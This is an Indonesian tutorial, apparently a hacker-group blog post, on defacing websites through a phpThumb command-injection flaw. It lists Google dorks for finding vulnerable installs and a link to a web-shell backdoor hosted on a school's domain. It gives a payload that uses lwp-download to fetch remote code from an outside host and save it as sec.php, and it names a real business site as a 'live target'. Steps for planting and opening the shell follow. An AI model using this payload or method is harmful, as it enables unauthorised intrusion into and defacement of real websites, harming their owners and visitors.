-
Hai Sobat.
Saya ikal
Disini, saya akan share cara deface poc phpThumb Command Injection
-
Yaps, sesuai judul. apasih phpThumb itu? Cari sendiri hehe. Dan apa sih command Injection itu? Cari sendiri. Agar apa? Agar nih artikel tidak terlalu panjang. Okeh langsung saja.
Bahan :
- dork :
inurl:/images/phpThumb.php
inurl:/phpThumb.php
inurl:/phpThumb/phpThumb.php
- shell backdoor :
https://smkn1pangandaran.sch.id/sec.txt
Payload / exploit :
?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;lwp-download http://www.wanoja.com/Awokwokwokwokwok.txt sec.php;&phpThumbDebug=9
Live target :
https://petersmithantiques.co.uk/
https://petersmithantiques.co.uk/
> pertama kalian cari file phpThumb.php nya, dengan cara mengklik open in new tab image yang ada lalu klik url. Atau kalian tidak perlu repot² mencarinya, kalian hanya perlu mendorking dengan dork dorking di google image, lalu open in new tab gambar nya dan cek url nya.
Contoh :
> lalu kalian tinggal salin exploit nya dan taruh di akhir url seperti /phpThumb.php?src=blablabla
> untuk meng-upload shell kalian bisa gunakan perintah lwp-download seperti exploit yang saya kasih di atas. Jika exploit sudah dimasukan kedalam url, tinggal kalian klik enter.
> Lalu kalian tinggal akses saja.
https://localhost/path/sec.php
Yah mungkin segini saja untuk artikel kali ini.
Thanks for my friend buat live targetnya xixixi from Team Hillusion Exploit ID
Greetz : Tex7ure
Thanks
See u
